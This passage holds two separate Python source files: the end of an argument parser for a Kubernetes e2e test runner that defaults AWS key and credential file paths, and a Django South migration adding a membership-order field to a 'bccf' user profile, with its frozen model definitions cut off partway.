parser.add_argument(
'--kubetest_args',
action='append',
default=[],
help='Send unrecognized args directly to kubetest')
# kops & aws
# TODO(justinsb): replace with --provider=aws --deployment=kops
parser.add_argument(
'--aws', action='store_true', help='E2E job runs in aws')
parser.add_argument(
'--aws-profile',
default=(
os.environ.get('AWS_PROFILE') or
os.environ.get('AWS_DEFAULT_PROFILE') or
'default'
),
help='Profile within --aws-cred to use')
parser.add_argument(
'--aws-role-arn',
default=os.environ.get('KOPS_E2E_ROLE_ARN'),
help='Use --aws-profile to run as --aws-role-arn if set')
parser.add_argument(
'--aws-ssh',
default=os.environ.get('JENKINS_AWS_SSH_PRIVATE_KEY_FILE'),
help='Path to private aws ssh keys')
parser.add_argument(
'--aws-pub',
default=os.environ.get('JENKINS_AWS_SSH_PUBLIC_KEY_FILE'),
help='Path to pub aws ssh key')
parser.add_argument(
'--aws-cred',
default=os.environ.get('JENKINS_AWS_CREDENTIALS_FILE'),
help='Path to aws credential file')
parser.add_argument(
'--aws-cluster-domain', help='Domain of the aws cluster for aws-pr jobs')
parser.add_argument(
'--kops-nodes', default=4, type=int, help='Number of nodes to start')
parser.add_argument(
'--kops-state', default='s3://k8s-kops-prow/',
help='Name of the aws state storage')
parser.add_argument(
'--kops-state-gce', default='gs://k8s-kops-gce/',
help='Name of the kops state storage for GCE')
parser.add_argument(
'--kops-zones', help='Comma-separated list of zones else random choice')
parser.add_argument(
'--kops-build', action='store_true', help='If we need to build kops locally')
# kubetest flags that also trigger behaviour here
parser.add_argument(
'--provider', help='provider flag as used by kubetest')
parser.add_argument(
'--deployment', help='deployment flag as used by kubetest')
return parser
def parse_args(args=None):
"""Return args, adding unrecognized args to kubetest_args."""
parser = create_parser()
args, extra = parser.parse_known_args(args)
args.kubetest_args += extra
if (args.image_family or args.image_project) and args.mode == 'docker':
raise ValueError(
'--image-family / --image-project is not supported in docker mode')
if bool(args.image_family) != bool(args.image_project):
raise ValueError(
'--image-family and --image-project must be both set or unset')
if args.aws or args.provider == 'aws':
# If aws keys are missing, try to fetch from HOME dir
if not args.aws_ssh or not args.aws_pub or not args.aws_cred:
home = os.environ.get('HOME')
if not home:
raise ValueError('HOME dir not set!')
if not args.aws_ssh:
args.aws_ssh = '%s/.ssh/kube_aws_rsa' % home
print >>sys.stderr, '-aws-ssh key not set. Defaulting to %s' % args.aws_ssh
if not args.aws_pub:
args.aws_pub = '%s/.ssh/kube_aws_rsa.pub' % home
print >>sys.stderr, '--aws-pub key not set. Defaulting to %s' % args.aws_pub
if not args.aws_cred:
args.aws_cred = '%s/.aws/credentials' % home
print >>sys.stderr, '--aws-cred not set. Defaulting to %s' % args.aws_cred
return args
if __name__ == '__main__':
main(parse_args())
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'UserProfile.membership_order_free'
db.add_column(u'bccf_userprofile', 'membership_order_free',
self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='free_order', null=True, to=orm['shop.Order']),
keep_default=False)
def backwards(self, orm):
# Deleting field 'UserProfile.membership_order_free'
db.delete_column(u'bccf_userprofile', 'membership_order_free_id')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'bccf.article': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Article'},
'attached_document': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['shop.Product']", 'null': 'True', 'blank': 'True'})
},
u'bccf.bccfbabypage': {
'Meta': {'ordering': "('order',)", 'object_name': 'BCCFBabyPage', '_ormbases': [u'bccf.BCCFChildPage']},
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
u'bccf.bccfchildpage': {
'Meta': {'ordering': "('-created',)", 'object_name': 'BCCFChildPage'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'bccf_topic': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['bccf.BCCFTopic']", 'null': 'True', 'blank': 'True'}),
u'comments_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'content_model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'gparent': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.BCCFPage']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'page_for': ('django.db.models.fields.CharField', [], {'default': "'parent'", 'max_length': '13', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.BCCFChildPage']", 'null': 'True', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'rating_average': ('django.db.models.fields.FloatField', [], {'default': '0'}),
u'rating_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
u'rating_sum': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'bccf.bccfgenericpage': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'BCCFGenericPage', '_ormbases': [u'bccf.BCCFChildPage']},
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'show_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'show_rating': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'show_resources': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
u'bccf.bccfpage': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'BCCFPage', '_ormbases': [u'pages.Page']},
'carousel_color': ('django.db.models.fields.CharField', [], {'default': "'dgreen-list'", 'max_length': '11'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'marquee': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.PageMarquee']", 'null': 'True', 'blank': 'True'}),
u'page_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['pages.Page']", 'unique': 'True', 'primary_key': 'True'})
},
u'bccf.bccftopic': {
'Meta': {'object_name': 'BCCFTopic'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'carousel_color': ('django.db.models.fields.CharField', [], {'default': "'dgreen-list'", 'max_length': '11'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'marquee': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.PageMarquee']", 'null': 'True', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'bccf.blog': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Blog', '_ormbases': [u'bccf.BCCFChildPage']},
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'})
},
u'bccf.campaign': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Campaign'},
'approve': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'approved_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'by_user': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'campaigns'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'bccf.downloadableform': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'DownloadableForm'},
'attached_document': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['shop.Product']", 'null': 'True', 'blank': 'True'})
},
u'bccf.event': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Event', '_ormbases': [u'bccf.BCCFChildPage']},
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'date_end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'full': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'location_city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'location_postal_code': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'location_street': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'location_street2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'max_seats': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'price': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'program': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'program'", 'null': 'True', 'to': u"orm['bccf.Program']"}),
'provider': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'events'", 'null': 'True', 'to': u"orm['auth.User']"}),
'survey_after': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'survey_after'", 'null': 'True', 'to': u"orm['builder.FormPublished']"}),
'survey_before': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'survey_before'", 'null': 'True', 'to': u"orm['builder.FormPublished']"})
},
u'bccf.eventregistration': {
'Meta': {'object_name': 'EventRegistration'},
'event': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'event_registration'", 'to': u"orm['bccf.Event']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'passed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'registration_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'bccf.footermarquee': {
'Meta': {'object_name': 'FooterMarquee'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'bccf.footermarqueeslide': {
'Meta': {'object_name': 'FooterMarqueeSlide'},
'caption': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'marquee': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['bccf.FooterMarquee']", 'symmetrical': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '50', 'null': 'True', 'blank': 'True'})
},
u'bccf.homemarquee': {
'Meta': {'object_name': 'HomeMarquee'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'bccf.homemarqueeslide': {
'Meta': {'object_name': 'HomeMarqueeSlide'},
'caption': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'linkLabel': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '10', 'null': 'True', 'blank': 'True'}),
'marquee': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['bccf.HomeMarquee']", 'symmetrical': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '50', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'bccf.magazine': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Magazine'},
'attached_document': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['shop.Product']", 'null': 'True', 'blank': 'True'})
},
u'bccf.pagemarquee': {
'Meta': {'object_name': 'PageMarquee'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'bccf.pagemarqueeslide': {
'Meta': {'object_name': 'PageMarqueeSlide'},
'caption': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'linkLabel': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '10', 'null': 'True', 'blank': 'True'}),
'marquee': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['bccf.PageMarquee']", 'symmetrical': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '50', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'bccf.podcast': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Podcast', '_ormbases': [u'bccf.BCCFChildPage']},
'attached_audio': ('mezzanine.core.fields.FileField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['shop.Product']", 'null': 'True', 'blank': 'True'})
},
u'bccf.program': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Program', '_ormbases': [u'bccf.BCCFChildPage']},
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'user_added': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'bccf.programrequest': {
'Meta': {'ordering': "('-created',)", 'object_name': 'ProgramRequest'},
'accept': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'accepted_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'comment': ('mezzanine.core.fields.RichTextField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'program_requests'", 'to': u"orm['auth.User']"})
},
u'bccf.settings': {
'Meta': {'object_name': 'Settings'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'bccf.tipsheet': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'TipSheet'},
'attached_document': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['shop.Product']", 'null': 'True', 'blank': 'True'})
},
u'bccf.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'account_number': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'accreditation': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['bccf.Program']", 'null': 'True', 'blank': 'True'}),
'autosubscribe': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'avatar': ('bccf.fields.MyImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'facebook': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'default': "'male'", 'max_length': '6', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_mailing_list': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_forum_moderator': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'job_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'default': "'en'", 'max_length': '10', 'blank': 'True'}),
'linkedin': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'membership_level': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'membership_order': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'order'", 'null': 'True', 'to': u"orm['shop.Order']"}),
'membership_order_free': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'free_order'", 'null': 'True', 'to': u"orm['shop.Order']"}),
'membership_type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'members'", 'null': 'True', 'to': u"orm['bccf.UserProfile']"}),
'phone_mobile': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'phone_primary': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'phone_work': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'photo': ('bccf.fields.MyImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'pinterest': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'post_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'postal_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'province': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'region': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'requested_cancellation': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'show_in_list': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'show_signatures': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'signature': ('django.db.models.fields.TextField', [], {'max_length': '1024', 'blank': 'True'}),
'signature_html': ('django.db.models.fields.TextField', [], {'max_length': '1054', 'blank': 'True'}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'street_2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'street_3': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'time_zone': ('django.db.models.fields.FloatField', [], {'default': '3.0'}),
'twitter': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': u"orm['auth.User']"}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'youtube': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'bccf.video': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Video', '_ormbases': [u'bccf.BCCFChildPage']},
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['shop.Product']", 'null': 'True', 'blank': 'True'}),
'video_url': ('embed_video.fields.EmbedVideoField', [], {'default': "''", 'max_length': '1024', 'null': 'True', 'blank': 'True'})
},
u'builder.formpublished': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'FormPublished'},
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'form_structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['builder.FormStructure']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'builder.formstructure': {
'Meta': {'object_name': 'FormStructure'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'structure': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'default': "'Form Structure'", 'max_length': '100'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'JSON'", 'max_length': '4'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'pages.page': {
'Meta': {'ordering': "(u'titles',)", 'object_name': 'Page'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'content_model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_menus': ('mezzanine.pages.fields.MenusField', [], {'default': '(1, 2, 3)', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
